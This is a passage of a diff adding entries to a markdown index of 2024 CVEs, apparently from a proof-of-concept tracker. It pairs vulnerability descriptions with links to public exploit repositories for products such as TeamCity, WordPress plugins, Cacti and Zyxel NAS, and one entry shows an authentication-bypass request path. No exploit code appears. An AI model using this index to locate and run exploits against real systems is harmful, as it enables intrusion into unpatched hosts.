+- [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc)
+
+### CVE-2024-25733
+- [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC)
+
+### CVE-2024-25809
+- [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809)
+
+### CVE-2024-25832 (2024-02-28)
+
+F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension.
+
+
+- [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC)
+
+### CVE-2024-26026 (2024-05-08)
+
+\n\n\nAn SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n
+
+
+- [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026)
+- [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026)
+
+### CVE-2024-26218 (2024-04-09)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218)
+
+### CVE-2024-26229 (2024-04-09)
+
+Windows CSC Service Elevation of Privilege Vulnerability
+
+
+- [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229)
+- [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit)
+- [NVISOsecurity/CVE-2024-26229-BOF](https://github.com/NVISOsecurity/CVE-2024-26229-BOF)
+- [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229)
+
+### CVE-2024-26304 (2024-05-01)
+
+There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. \n\n
+
+
+- [Roud-Roud-Agency/CVE-2024-26304-RCE-exploits](https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits)
+
+### CVE-2024-26475 (2024-03-14)
+
+An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.
+
+
+- [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475)
+
+### CVE-2024-26503 (2024-03-14)
+
+Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.
+
+
+- [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503)
+
+### CVE-2024-26521 (2024-03-12)
+
+HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.
+
+
+- [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521)
+
+### CVE-2024-26534
+- [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534)
+
+### CVE-2024-26535
+- [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535)
+
+### CVE-2024-26560
+- [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560)
+
+### CVE-2024-26574 (2024-04-08)
+
+Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe
+
+
+- [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574)
+
+### CVE-2024-26817 (2024-04-13)
+
+In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow.
+
+
+- [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd)
+
+### CVE-2024-27130 (2024-05-21)
+
+A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute code via a network.\n\nWe have already fixed the vulnerability in the following version:\nQTS 5.1.7.2770 build 20240520 and later\nQuTS hero h5.1.7.2770 build 20240520 and later
+
+
+- [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130)
+- [d0rb/CVE-2024-27130](https://github.com/d0rb/CVE-2024-27130)
+
+### CVE-2024-27173 (2024-06-14)
+
+Remote Command program allows an attacker to get Remote Code Execution by overwriting existing Python files containing executable code. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point.\n https://www.toshibatec.com/contacts/products/ \nAs for the affected products/models/versions, see the reference URL.
+
+
+- [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173)
+
+### CVE-2024-27198 (2024-03-04)
+
+In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
+
+
+- [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198)
+- [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198)
+- [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE)
+- [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198)
+- [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE)
+- [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE)
+- [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT)
+- [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-)
+- [Stuub/RCity-CVE-2024-27198](https://github.com/Stuub/RCity-CVE-2024-27198)
+
+### CVE-2024-27282 (-)
+
+An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1.
+
+
+- [Abo5/CVE-2024-27282](https://github.com/Abo5/CVE-2024-27282)
+
+### CVE-2024-27316 (2024-04-04)
+
+HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
+
+
+- [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316)
+- [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc)
+
+### CVE-2024-27348 (2024-04-22)
+
+RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n
+
+
+- [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348)
+- [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348)
+- [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE)
+
+### CVE-2024-27460 (2024-05-10)
+
+A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below.
+
+
+- [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460)
+- [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460)
+- [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer)
+
+### CVE-2024-27462
+- [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462)
+
+### CVE-2024-27474 (2024-04-10)
+
+Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators.
+
+
+- [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC)
+
+### CVE-2024-27518 (2024-04-29)
+
+An issue in SUPERAntiSyware Professional X 10.0.1262 and 10.0.1264 allows unprivileged attackers to escalate privileges via a restore of a crafted DLL file into the C:\Program Files\SUPERAntiSpyware folder.
+
+
+- [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518)
+
+### CVE-2024-27619 (2024-03-29)
+
+Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to Buffer Overflow. Any user having read/write access to ftp server can write directly to ram causing buffer overflow if file or files uploaded are greater than available ram. Ftp server allows change of directory to root which is one level up than root of usb flash directory. During upload ram is getting filled and causing system resource exhaustion (no free memory) which causes system to crash and reboot.
+
+
+- [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos)
+
+### CVE-2024-27630 (2024-04-08)
+
+Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.
+
+
+- [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630)
+
+### CVE-2024-27631 (2024-04-08)
+
+Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php
+
+
+- [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631)
+
+### CVE-2024-27632 (2024-04-08)
+
+An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function.
+
+
+- [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632)
+
+### CVE-2024-27665 (2024-04-09)
+
+Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module.
+
+
+- [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665)
+
+### CVE-2024-27673
+- [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673)
+
+### CVE-2024-27674 (2024-04-03)
+
+Macro Expert through 4.9.4 allows BUILTIN\Users:(OI)(CI)(M) access to the "%PROGRAMFILES(X86)%\GrassSoft\Macro Expert" folder and thus an unprivileged user can escalate to SYSTEM by replacing the MacroService.exe binary.
+
+
+- [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674)
+
+### CVE-2024-27697
+- [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697)
+
+### CVE-2024-27804 (2024-05-13)
+
+The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.
+
+
+- [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804)
+
+### CVE-2024-27815 (2024-06-10)
+
+An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.
+
+
+- [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815)
+
+### CVE-2024-27956 (2024-03-21)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\n
+
+
+- [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956)
+- [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE)
+- [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN)
+- [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956)
+- [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956)
+- [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956)
+- [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package)
+- [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956)
+- [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956)
+- [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE)
+- [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE)
+
+### CVE-2024-27971 (2024-05-17)
+
+Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion.This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10.
+
+
+- [truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note)
+
+### CVE-2024-27972 (2024-04-03)
+
+Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection.This issue affects WP Fusion Lite: from n/a through 3.41.24.\n\n
+
+
+- [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc)
+
+### CVE-2024-27983 (2024-04-09)
+
+An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.
+
+
+- [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2)
+
+### CVE-2024-28085 (2024-03-27)
+
+wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.
+
+
+- [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085)
+
+### CVE-2024-28088 (2024-03-03)
+
+LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)
+
+
+- [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc)
+
+### CVE-2024-28116 (2024-03-21)
+
+Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.
+
+
+- [akabe1/Graver](https://github.com/akabe1/Graver)
+
+### CVE-2024-28247 (2024-03-27)
+
+The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pihole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs from behind, reading files is done as a privileged user.If the URL that is in the list of "Adslists" begins with "file*" it is understood that it is updating from a local file, on the other hand if it does not begin with "file*" depending on the state of the response it does one thing or another. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed by 5.18.
+
+
+- [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read)
+
+### CVE-2024-28255 (2024-03-15)
+
+OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.
+
+
+- [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255)
+
+### CVE-2024-28397 (2024-06-20)
+
+An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
+
+
+- [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape)
+- [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape)
+
+### CVE-2024-28515 (2024-04-03)
+
+Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component.
+
+
+- [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515)
+
+### CVE-2024-28589 (2024-04-03)
+
+An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before, allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure DLL loading from a world-writable directory during service initialization.
+
+
+- [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589)
+
+### CVE-2024-28715 (2024-03-19)
+
+Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.
+
+
+- [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715)
+
+### CVE-2024-28741 (2024-04-06)
+
+Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component.
+
+
+- [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc)
+
+### CVE-2024-28757 (2024-03-10)
+
+libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).
+
+
+- [krnidhi/expat_2.1.1_CVE-2024-28757](https://github.com/krnidhi/expat_2.1.1_CVE-2024-28757)
+- [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757)
+- [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757)
+- [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757)
+
+### CVE-2024-28995 (2024-06-06)
+
+\n\n\n\n\n\n\n\n\n\n\n\nSolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. \n\n\n\n\n\n\n\n
+
+
+- [karkis3c/cves](https://github.com/karkis3c/cves)
+- [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995)
+- [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995)
+- [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template)
+- [0xkucing/CVE-2024-28995](https://github.com/0xkucing/CVE-2024-28995)
+- [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995)
+
+### CVE-2024-28999 (2024-06-04)
+
+The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console.
+
+
+- [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999)
+
+### CVE-2024-29059 (2024-03-22)
+
+.NET Framework Information Disclosure Vulnerability
+
+
+- [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak)
+
+### CVE-2024-29269 (2024-04-10)
+
+An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.
+
+
+- [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269)
+- [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269)
+- [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269)
+- [Jhonsonwannaa/CVE-2024-29269](https://github.com/Jhonsonwannaa/CVE-2024-29269)
+
+### CVE-2024-29272 (2024-03-22)
+
+Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
+
+
+- [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272)
+
+### CVE-2024-29275 (2024-03-22)
+
+SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php.
+
+
+- [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template)
+
+### CVE-2024-29278 (2024-03-30)
+
+funboot v1.1 is vulnerable to Cross Site Scripting (XSS) via the title field in "create a message ."
+
+
+- [QDming/cve](https://github.com/QDming/cve)
+
+### CVE-2024-29296 (2024-04-10)
+
+A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not.
+
+
+- [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296)
+- [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC)
+
+### CVE-2024-29375 (2024-04-04)
+
+CSV Injection vulnerability in Addactis IBNRS v.3.10.3.107 allows a remote attacker to execute arbitrary code via a crafted .ibnrs file to the Project Description, Identifiers, Custom Triangle Name (inside Input Triangles) and Yield Curve Name parameters.
+
+
+- [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375)
+
+### CVE-2024-29399 (2024-04-11)
+
+An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component.
+
+
+- [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399)
+
+### CVE-2024-29824 (2024-05-31)
+
+An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
+
+
+- [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824)
+- [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824)
+
+### CVE-2024-29849 (2024-05-22)
+
+Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface.
+
+
+- [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849)
+
+### CVE-2024-29855 (2024-06-11)
+
+Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator
+
+
+- [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855)
+
+### CVE-2024-29868 (2024-06-24)
+
+Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.\nThis allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.\nThis issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n
+
+
+- [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868)
+
+### CVE-2024-29895 (2024-05-13)
+
+Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.
+
+
+- [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC)
+- [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895)
+- [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py)
+- [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895)
+
+### CVE-2024-29972 (2024-06-04)
+
+** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
+
+
+- [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972)
+
+### CVE-2024-29973 (2024-06-04)
+
+** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
+
+
+- [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973)
+- [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973)
+- [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973)
+- [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973)
+- [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973)
+
+### CVE-2024-29988 (2024-04-09)
+
+SmartScreen Prompt Security Feature Bypass Vulnerability
+
+
+- [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit)
+
+### CVE-2024-30043 (2024-05-14)
+
+Microsoft SharePoint Server Information Disclosure Vulnerability
+
+
+- [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE)
+
+### CVE-2024-30056 (2024-05-25)
+
+Microsoft Edge (Chromium-based) Information Disclosure Vulnerability
+
+
+- [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure)
+
+### CVE-2024-30088 (2024-06-11)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088)
+
+### CVE-2024-30212 (2024-05-28)
+
+If a SCSI READ(10) command is initiated via USB using the largest LBA \n(0xFFFFFFFF) with it's default block size of 512 and a count of 1,\n\nthe first 512 byte of the 0x80000000 memory area is returned to the \nuser. If the block count is increased, the full RAM can be exposed.\n\nThe same method works to write to this memory area. If RAM contains \npointers, those can be - depending on the application - overwritten to\n\nreturn data from any other offset including Progam and Boot Flash.
+
+
+- [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak)
+
+### CVE-2024-30255 (2024-04-04)
+
+Envoy is a cloud-native, open source edge and service proxy. The HTTP/2 protocol stack in Envoy versions prior to 1.29.3, 1.28.2, 1.27.4, and 1.26.8 are vulnerable to CPU exhaustion due to flood of CONTINUATION frames. Envoy's HTTP/2 codec allows the client to send an unlimited number of CONTINUATION frames even after exceeding Envoy's header map limits. This allows an attacker to send a sequence of CONTINUATION frames without the END_HEADERS bit set causing CPU utilization, consuming approximately 1 core per 300Mbit/s of traffic and culminating in denial of service through CPU exhaustion. Users should upgrade to version 1.29.3, 1.28.2, 1.27.4, or 1.26.8 to mitigate the effects of the CONTINUATION flood. As a workaround, disable HTTP/2 protocol for downstream connections.
+
+
+- [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC)
+
+### CVE-2024-30270 (2024-04-04)
+
+mailcow: dockerized is an open source groupware/email suite based on docker. A security vulnerability has been identified in mailcow affecting versions prior to 2024-04. This vulnerability is a combination of path traversal and arbitrary code execution, specifically targeting the `rspamd_maps()` function. It allows authenticated admin users to overwrite any file writable by the www-data user by exploiting improper path validation. The exploit chain can lead to the execution of arbitrary commands on the server. Version 2024-04 contains a patch for the issue.
+
+
+- [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC)
+
+### CVE-2024-30491 (2024-03-29)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.8.\n\n
+
+
